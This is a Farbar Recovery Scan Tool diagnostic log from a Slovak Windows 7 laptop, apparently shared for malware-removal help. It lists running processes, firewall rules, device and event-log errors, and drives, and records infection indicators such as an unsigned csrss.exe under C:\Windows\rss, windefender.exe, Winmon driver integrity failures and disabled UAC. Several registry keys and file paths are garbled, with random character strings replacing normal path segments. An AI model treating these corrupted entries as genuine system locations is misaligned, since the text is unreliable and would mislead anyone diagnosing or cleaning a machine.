2019-10-21 13:56 - 2019-10-21 13:56 - 002286747 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\LIBEAY32.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 000416627 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\SSLEAY32.dll
2019-05-12 10:51 - 2019-05-12 10:51 - 005196800 _____ (University of Tsukuba) [File not signed] C:\Program Files\SoftEther VPN Client\VpnGatePlugin_x64.dll
2019-04-02 17:10 - 2017-03-20 15:13 - 000087552 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppCollect.dll
2019-04-02 17:10 - 2017-03-20 15:13 - 000197632 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppCommon.dll
==================== Alternate Data Streams (Whitelisted) ========
==================== Safe Mode (Whitelisted) ==================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea => ""="Service"
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea => ""="Service"
==================== Association (Whitelisted) =================
==================== Internet Explorer trusted/restricted ==========
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\webcompanion.com -> hxxp://webcompanion.com
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-14 03:34 - 2020-01-22 20:05 - 000000027 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1 localhost
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGizadie plochy.bmp
DNS Servers: 192.168.0.1
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7rmsCe65wKzPTw5jtS38n2tVEGi => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [{0D112C7C-66E1-4D54-AEB0-EE8E3A163F04}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{E7E2670E-7962-4AFA-8A93-AD4B754A76A2}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [TCP Query User{C9127F07-56E6-49D5-A059-BE4717D6DCD0}C:\portable\utorrent-portable\utorrent.exe] => (Allow) C:\portable\utorrent-portable\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{046EB926-BC54-4B7B-8553-B4B8557D4320}C:\portable\utorrent-portable\utorrent.exe] => (Allow) C:\portable\utorrent-portable\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [{33BE3F4B-2176-4BF9-8DAD-71F2993C7E22}] => (Allow) C:\Portable\utorrent-portable\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [{034F37EC-98CC-400F-A7F2-54D67FA53CE7}] => (Allow) C:\Portable\utorrent-portable\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{72EA0069-1AE7-4F99-B211-021D3B204CC0}C:\program files\totalcmd\totalcmd64.exe] => (Allow) C:\program files\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH) [File not signed]
FirewallRules: [UDP Query User{7FF58BC0-AE02-48BE-B6F5-0B8F96943D04}C:\program files\totalcmd\totalcmd64.exe] => (Allow) C:\program files\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH) [File not signed]
FirewallRules: [{0957BBF0-D65F-4D9C-B51D-C765EA416DF7}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe (Intel(R) Wireless Connectivity Solutions -> )
FirewallRules: [TCP Query User{88E30C4A-334F-4EB7-935A-7BC2452751D3}C:\program files\filezilla ftp client\filezilla.exe] => (Allow) C:\program files\filezilla ftp client\filezilla.exe (Tim Kosse -> FileZilla Project)
FirewallRules: [UDP Query User{4C22E9E2-776E-4273-B65F-CB1E71B0E17B}C:\program files\filezilla ftp client\filezilla.exe] => (Allow) C:\program files\filezilla ftp client\filezilla.exe (Tim Kosse -> FileZilla Project)
FirewallRules: [TCP Query User{D5552FCB-7B8C-4A55-BCDA-866776675FD0}C:\program files\qtox\bin\qtox.exe] => (Allow) C:\program files\qtox\bin\qtox.exe () [File not signed]
FirewallRules: [UDP Query User{FDC9932A-896B-42DE-A1CE-0406F806B579}C:\program files\qtox\bin\qtox.exe] => (Allow) C:\program files\qtox\bin\qtox.exe () [File not signed]
FirewallRules: [{D75DA9A3-9755-4F80-98D4-2EF07ED17614}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{6A3D486A-8B54-46A8-90CD-2B592EB9EBF6}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{9050C82E-1247-429A-85DB-56FE67C39482}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{3D1F2024-BC68-44C6-9035-211A5E556D48}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{611DFF0B-0DAB-4871-9AD2-91E4F9D70647}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [TCP Query User{9747B657-A166-43E8-831D-33F204BC2790}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe No File
FirewallRules: [UDP Query User{23B54518-BFAE-44C0-BD71-1342B40C49A7}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe No File
FirewallRules: [{0FDF3415-E5D8-493C-96D4-75A240355D2B}] => (Allow) C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{DB7D1A44-D27A-4E0E-85C6-691CEDCD37BC}] => (Allow) C:\Program Files\SoftEther VPN Client\vpnclient.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{95E4E855-A7CB-4193-AA0F-7B889EEF6193}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmgr.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{F7955E18-9789-4EEB-9C13-711CCA694B6A}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmd.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{99CE8752-A44F-4307-A1EE-4F54DEA2A760}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmgr_x64.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{0ADB4278-50BC-4AFE-AAE9-EFE1BB2E4547}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmd_x64.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{36E5F241-C08F-46E0-9466-1BC748A813DD}] => (Allow) C:\Users\Jomko\AppData\Local\Temp\7zS4058\HP.EasyStart.exe No File
FirewallRules: [{A79F7F72-CB8D-485D-B340-54C21C43C48B}] => (Allow) C:\Program Files\HP\HP LaserJet MFP M28-M31\bin\EWSProxy.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{2936F1E8-01AA-413E-BF0B-9B7345CD6630}] => (Allow) C:\Program Files\HP\HP LaserJet MFP M28-M31\bin\DigitalWizards.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{795728F4-FA31-4D9B-A4AB-78BB97087FA6}] => (Allow) C:\Program Files\HP\HP LaserJet MFP M28-M31\Bin\DeviceSetup.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{CC296BD8-C7AE-41FF-ADE9-3E0587CC9E2F}] => (Allow) LPort=5357
FirewallRules: [{35CA4271-53ED-4C97-986D-044960622E1F}] => (Allow) C:\Program Files\HP\HP LaserJet MFP M28-M31\Bin\HPNetworkCommunicatorCom.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{7AC26099-BE7F-4BFA-BEAF-FB184655BFC1}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [TCP Query User{65CCA3BC-5E01-4C02-8A65-D444D4094BDA}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [UDP Query User{5AA0508D-A7ED-409E-8567-CA6F25C48CC2}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [{F9AB2B23-2AC6-4DE0-A7FB-1DB375AED956}] => (Block) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [{72A5A12A-716B-4CFA-BD0C-3A90C219130B}] => (Block) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [TCP Query User{4218553C-8414-4FC1-AC03-AABE1168B85F}C:\program files\java\jre1.8.0_231\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_231\bin\javaw.exe No File
FirewallRules: [UDP Query User{B0D9DA1F-9B8B-4AB9-862B-90F0B455C8B4}C:\program files\java\jre1.8.0_231\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_231\bin\javaw.exe No File
FirewallRules: [{178817BF-A27F-4435-B34B-EEB2ECFB48E7}] => (Allow) C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\LogiOptionsMgr.EXE (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{63563E85-64C7-44E9-BB6F-8669228E4EF9}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{E5FB062C-8C90-4693-89F6-FB1FDBE0DE5B}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{E3904F86-8649-41ED-8BE1-960F80CE1B03}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{2D08EE70-88F2-4649-8299-B182B79733E6}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{8A4FB251-5506-42DA-AB5C-14C992BB4DFE}] => (Allow) C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
FirewallRules: [{9D9FB80D-2A4F-444D-B2C1-818FF186B9B7}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
FirewallRules: [{EAEBB15E-23FF-4F2F-9A5B-23A2C12AE1A5}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
==================== Restore Points =========================
==================== Faulty Device Manager Devices ============
Name: Bluetooth Server
Description: Bluetooth Server
Class Guid: {34446e8e-37b4-4b16-9da6-bea2db33465a}
Manufacturer: Intel Corporation
Service: btmaux
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
Name: Periférne zariadenie Bluetooth
Description: Periférne zariadenie Bluetooth
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
Name: WinmonProcessMonitor
Description: WinmonProcessMonitor
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: WinmonProcessMonitor
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
Name: Periférne zariadenie Bluetooth
Description: Periférne zariadenie Bluetooth
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
Name: Periférne zariadenie Bluetooth
Description: Periférne zariadenie Bluetooth
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
Name: Periférne zariadenie Bluetooth
Description: Periférne zariadenie Bluetooth
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
==================== Event log errors: ========================
Application errors:
==================
Error: (02/06/2020 09:26:55 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program FRST64.exe version 2.2.2020.2 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: 26b4
Start Time: 01d5dd2b691f3bb9
Termination Time: 2
Application Path: E:\install\FRST64.exe
Report Id: 00482e41-491f-11ea-9cd7-0c8bfd901919
Error: (02/06/2020 09:04:16 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3006) (User: NT AUTHORITY)
Description: Unable to read the performance counter strings defined for the 01B language ID. The first DWORD in the Data section contains the Win32 error code.
Error: (02/06/2020 09:04:16 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3006) (User: NT AUTHORITY)
Description: Unable to read the performance counter strings defined for the 01B language ID. The first DWORD in the Data section contains the Win32 error code.
Error: (02/06/2020 09:04:16 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
Error: (02/06/2020 08:58:16 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
Error: (01/27/2020 06:29:44 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
Error: (01/26/2020 10:57:58 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3006) (User: NT AUTHORITY)
Description: Unable to read the performance counter strings defined for the 01B language ID. The first DWORD in the Data section contains the Win32 error code.
Error: (01/26/2020 10:57:58 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3006) (User: NT AUTHORITY)
Description: Unable to read the performance counter strings defined for the 01B language ID. The first DWORD in the Data section contains the Win32 error code.
System errors:
=============
Error: (02/06/2020 09:09:50 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 70.
Error: (02/06/2020 09:09:50 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 70.
Error: (02/06/2020 09:09:50 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 70.
Error: (02/06/2020 09:09:49 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 70.
Error: (02/06/2020 08:58:19 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Nasledujúce ovládače pre spustenie zavedenia alebo spustenie systému zlyhali pri načítaní:
cdrom
Error: (02/06/2020 08:58:15 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Spustenie služby Main Service zlyhalo kvôli nasledujúcej chybe:
Systém nemôže nájsť zadaný súbor.
Error: (01/27/2020 06:30:01 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Nasledujúce ovládače pre spustenie zavedenia alebo spustenie systému zlyhali pri načítaní:
cdrom
Error: (01/27/2020 06:29:43 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Spustenie služby Main Service zlyhalo kvôli nasledujúcej chybe:
Systém nemôže nájsť zadaný súbor.
Windows Defender:
===================================
Date: 2019-09-17 22:50:36.541
Description:
Windows Defender scan has been stopped before completion.
Scan ID:{D3AB2F47-DE50-48D7-A60C-9877224729C3}
Scan Type:AntiSpyware
Scan Parameters:Quick Scan
Date: 2018-07-04 22:05:48.863
Description:
Windows Defender has encountered an error trying to update signatures.
New Signature Version:1.271.442.0
Previous Signature Version:1.269.1075.0
Update Source:User
Signature Type:AntiSpyware
Update Type:Delta
Current Engine Version:1.1.15000.2
Previous Engine Version:1.1.14901.4
Error code:0x80070666
Error description:Už je nainštalovaná iná verzia produktu. Inštaláciu tejto verzie nemožno dokončiť. Ak chcete existujúcu verziu produktu nakonfigurovať alebo odstrániť, použite ovládací panel Pridať alebo odstrániť programy.
Date: 2018-07-04 22:05:48.863
Description:
Windows Defender has encountered an error trying to update the engine.
New Engine Version:1.1.15000.2
Previous Engine Version:1.1.14901.4
Update Source:User
Error Code:0x80070666
Error description:Už je nainštalovaná iná verzia produktu. Inštaláciu tejto verzie nemožno dokončiť. Ak chcete existujúcu verziu produktu nakonfigurovať alebo odstrániť, použite ovládací panel Pridať alebo odstrániť programy.
CodeIntegrity:
===================================
Date: 2020-02-06 20:58:11.850
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2020-02-06 20:58:11.835
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2020-01-26 22:55:16.111
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2020-01-26 22:55:16.096
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2020-01-26 22:55:01.178
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2020-01-26 22:55:01.147
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Memory info ===========================
BIOS: TOSHIBA 1.90 09/19/2014
Motherboard: TOSHIBA VG10S
Processor: Intel(R) Core(TM) i7-4700MQ CPU @ 2.40GHz
Percentage of memory in use: 96%
Total physical RAM: 8103.89 MB
Available physical RAM: 319.92 MB
Total Virtual: 22102.04 MB
Available Virtual: 11561.28 MB
==================== Drives ================================
Drive c: (Windows 7) (Fixed) (Total:143.37 GB) (Free:13.21 GB) NTFS
Drive d: (Windows 10) (Fixed) (Total:94.4 GB) (Free:12.26 GB) NTFS
Drive e: (data) (Fixed) (Total:465.76 GB) (Free:24.75 GB) NTFS
\\?\Volume{fddfa42c-f3c0-11e7-944c-806e6f6e6963}\ (Vyhradené systémom) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS
\\?\Volume{ff0173d9-491a-11ea-9cd7-806e6f6e6963}\ () (Fixed) (Total:0.61 GB) (Free:0.08 GB) NTFS
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: 3C2BC5FC)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)
==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 238.5 GB) (Disk ID: C14F8450)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=143.4 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=94.4 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=622 MB) - (Type=27)
==================== End of Addition.txt =======================
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 02-02-2020 02
Ran by Jomko (administrator) on JOMKO_WIN7 (TOSHIBA SATELLITE P50-A-13C) (06-02-2020 21:28:34)
Running from C:\Users\Jomko\Desktop
Loaded Profiles: Jomko (Available Profiles: Jomko)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: Slovenčina (Slovensko)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
() [File not signed] C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGin-0502.exe
() [File not signed] C:\Users\Jomko\AppData\Local\Temp\wup\wup.exe
() [File not signed] C:\Windows\rss\csrss.exe
(Access Denied) [File not signed] C:\Windows\windefender.exe
(ActMask Group Co., Ltd -> ActMask Co.,Ltd - hxxp://WWW.ALL2PDF.COM) C:\Windows\System32\PrintCtrl.exe
(ActMask Group Co., Ltd -> ActMask Co.,Ltd - hxxp://www.all2pdf.com) C:\Windows\System32\PrintDisp.exe
(ActMask Group Co., Ltd -> ActMask Co.,Ltd - hxxp://www.all2pdf.com) C:\Windows\System32\PrintDisp.exe
(Adobe Inc. -> Adobe Systems) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Atheros Communications Inc. -> Atheros Communications) [File not signed] C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(EpicNet Inc.) [File not signed] C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
(IDT, Inc.) [File not signed] C:\Program Files\IDT\WDM\stacsv64.exe
(Intel Corporation - Software and Firmware Products -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Intel Corporation -> ) C:\Windows\System32\igfxTray.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Intel(R) Wireless Connectivity Solutions -> Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Intel(R) Wireless Connectivity Solutions -> Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel(R) Wireless Connectivity Solutions -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
(Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Logitech Inc -> Logitech) C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\LogiOverlay.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\LogiOptions\LogiOptions.exe
(Logitech Inc -> Logitech, Inc.) C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\laclient.exe
(Logitech Inc -> Logitech, Inc.) C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\LogiOptionsMgr.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe
(SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe
(SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Client\vpncmgr_x64.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Windows Media Audio AEC for Media Foundation) (Access Denied) C:\ProgramData\x86_microsoft-windows-d..directplay4-payload_31bf3856ad364e35_1.0.18362.1_none_148c99f79b506e6c\PortableDeviceClassExtension.exe
(Wondershare Technology Co.,Ltd -> Wondershare) C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe
Failed to access process -> SearchProtocolHost.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [BTMTrayAgent] => C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll [7953576 2017-05-10] (Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.)
HKLM\...\Run: [PrintDisp] => C:\Windows\system32\PrintDisp.exe [588936 2015-08-18] (ActMask Group Co., Ltd -> ActMask Co.,Ltd - hxxp://www.all2pdf.com)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [976032 2011-09-16] (Atheros Communications Inc. -> Atheros Communications) [File not signed]
